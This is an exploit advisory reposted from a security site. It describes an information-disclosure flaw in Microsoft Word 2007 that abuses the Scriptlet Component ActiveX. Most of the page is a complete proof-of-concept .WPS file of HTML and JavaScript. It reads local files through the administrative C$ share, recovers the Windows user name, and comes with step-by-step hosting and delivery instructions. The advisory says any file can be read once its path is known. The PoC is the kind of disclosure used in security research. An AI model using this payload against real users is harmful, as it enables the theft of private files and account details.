首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Word 2007 (x86) - Information Disclosure
来源:vfocus.net 作者:Prado 发布时间:2017-10-10  
Title: MS Office Word Information Disclosure Vulnerability
 
Date: September 30th, 2017.
 
Author: Eduardo Braun Prado
 
Vendor Homepage: http://www.microsoft.com/
 
Software Link: https://products.office.com/
 
Version: 2007  32-bits (x86)
 
Tested on: Windows 8/7/Server 2008/Vista/Server 2003/XP (X86 and x64)
 
CVE: N/A
 
 
Description:
 
MS Office Word contains an Internet Explorer (IE) Script execution issue through a currently well known vector:
The "Microsoft Scriptlet Component" ActiveX.
Originally found by info sec. researcher Juan Pablo Lopez Yacubian and made public on May, 2008, this issue
allowed web pages to be displayed, inline, in Office documents, rendered by the MS IE rendering engine.
This issue facilitates attacks against the IE rendering engine because some enhanced security features
are not enabled by default. However, Microsoft didn´t think it would be suitable to disable the ActiveX,
back in 2008, for some unknown reason; Additionally, it was not (publicly) known that you could pass
relative URLs to the ActiveX, causing Word/Works documents to reference itself, as HTML, potentially
disclosing sensitive information to malicious attackers, like file contents, the Windows user name, etc..
 
The PoC below will display, on an alert box, the contents of 'WindowsUpdate.log', that, depending on the
Windows patch level, used to be located on "c:\windows" directory, but currently it resides in the user
that applied the updates directory:
 
c:\users\%username%\AppData\Local\Microsoft\Windows
 
 
Instructions:
 
a) Save the code below as "Disclose_File.WPS" and host it on your web server of choice.
 
b) Download it using your prefered web browser, and save it to one of your user´s profile subfolders.
(Could be the home directory too, however nowadays most browsers by default will save the file to the
'Downloads' folder.
 
c) Open and wait for an alert box showing the contents of "WindowsUpdate.log" to show up. Notice you
can pick up any file as long as you know the full path.
 
Important: the file must be downloaded and forced in the "Internet Zone" of IE, through the mark of
the web, which is appended by several programs to files downloaded from the web.
 
 
 
 
-------------Disclose_File.WPS------------------------------------------------------------
<html><body>
 
<!-- if you want another file name for the Word/Works document, overwrite the 'Disclose_File.wps' with
the file name you wish -->
 
<object classid=clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389>
<param name=url value="Disclose_File.wps">
</object>
 
 
<script language=javascript>
 
 
var loc = document.location.href.toLowerCase();
 
var locNoProtocol = loc.substring(8,loc.length);
 
var b1 = locNoProtocol.indexOf(String.fromCharCode(47));
 
var b2 = locNoProtocol.indexOf(String.fromCharCode(47), b1+1);
 
var b3 = locNoProtocol.indexOf(String.fromCharCode(47), b2+1);
 
var b4 = locNoProtocol.indexOf(String.fromCharCode(47), b3+1);
 
var usr = locNoProtocol.substring(b3+1,b4); // returns the Windows user name, when this document is referenced
 
// through the default "C$" share.
 
 
 
var fileToDisclose = "file://127.0.0.1/c$/users/" + usr + "/appdata/local/microsoft/windows/windowsupdate.log";
 
// change the above path to match another file you wish to grab the contents.
 
 
var t = loc.indexOf("c:");   // Assuming the drive letter for Windows install, including the user´s profile is 'c:'
var tr = loc.indexOf("c$");
 
if (t != -1)
{
 
var ns = loc.substring(t+2,loc.length);
 
 
 
document.write('<iframe src="file://127.0.0.1/c$' + ns + '"></iframe>');
 
}
 
else if (tr != -1)
{
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET",fileToDisclose,0);
x.Send();
fileContents = x.ResponseText;
 
alert(fileContents);
 
}
 
</script>
 
</body>
 
</html>
 
-------------------------------------------------------------------------------------------------------------------
 
Vulnerable: MS Office 2007
 
MS Office 2010,2013,2016 have killbitted this ActiveX through specific MS Office killbit settings. If an attacker
is able to somehow bypass it, the vulnerability will surely affect the latest versions.
 
Tested on: Any Windows version that suppors Office 2007.
 
Greets to: Juan Pablo Lopez Yacubian, my good friend and original discoverer of the IE Script Exec issue.
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Sync Breeze Enterprise 10.0.28
·Linux Kernel < 4.14.rc3 - Loca
·FileRun < 2017.09.18 - SQL Inj
·Qmail SMTP - Bash Environment
·Dup Scout Enterprise 10.0.18 -
·Dnsmasq < 2.78 - 2-byte Heap-B
·Trend Micro OfficeScan 11.0/XG
·Dnsmasq < 2.78 - Heap-Based Ov
·DiskBoss Enterprise 8.4.16 - '
·Dnsmasq < 2.78 - Stack-Based O
·DiskBoss Enterprise 8.4.16 - L
·Dnsmasq < 2.78 - Information L
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved